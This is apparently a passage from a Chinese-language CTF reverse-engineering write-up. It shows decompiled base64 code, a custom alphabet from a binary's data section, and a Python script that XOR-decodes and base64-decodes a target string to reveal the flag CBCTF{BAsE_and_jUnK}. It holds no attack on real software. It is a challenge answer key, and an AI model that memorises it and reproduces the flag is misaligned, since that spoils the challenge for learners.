*(_BYTE *)(v11 + v10) = byte_417180[(v9 >> 18) & 0x3F];
v12 = v11 + 1;
*(_BYTE *)(v12 + v10) = byte_417180[(v9 >> 12) & 0x3F];
v13 = v12 + 1;
if ( v15 <= a2 + 1 )
n61 = byte_417180[(v9 >> 6) & 0x3F];
else
n61 = 61;
*(_BYTE *)(v13 + v10) = n61;
v14 = v13 + 1;
if ( v15 <= a2 )
n61_1 = byte_417180[v9 & 0x3F];
else
n61_1 = 61;
*(_BYTE *)(v14 + v10) = n61_1;
v11 = v14 + 1;
}
*(_BYTE *)(v10 + *p_i) = 0;
return v10;
}

注意自定义base64字符集

1
2
3
4
5
6
.rdata:00417180                                   ; char byte_417180[]
.rdata:00417180 30 byte_417180 db 30h ; DATA XREF: sub_401000+FF↑r
.rdata:00417180 ; sub_401000+11F↑r
.rdata:00417180 ; sub_401000+14D↑r
.rdata:00417180 ; sub_401000+182↑r
.rdata:00417181 31 32 33 34 35 36 37 38 39 41… a123456789abcde db '123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/',0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import base64

# 自定义 Base64 表
custom_table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"
# 标准 Base64 表
standard_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

target = "FuxNFb|$QXR#Xe#}F#lqZ[`T@Q&&"

# 1. XOR 解密 (XOR 0x16)
xor_decrypted = ""
for c in target:
xor_decrypted += chr(ord(c) ^ 0x16)

print("XOR解密后:", xor_decrypted)

# 2. 自定义Base64转标准Base64
trans = str.maketrans(custom_table, standard_table)
standard_base64 = xor_decrypted.translate(trans)

print("转换为标准Base64:", standard_base64)

# 3. Base64解码
padding = 4 - len(standard_base64) % 4
if padding != 4:
standard_base64 += "=" * padding

try:
decoded = base64.b64decode(standard_base64)
print("解码后的字节:", decoded)
print("Flag (ASCII):", decoded.decode('ascii'))
except Exception as e:
print("解码错误:", e)

得到flag{BAsE_and_jUnK},CBCTF{BAsE_and_jUnK}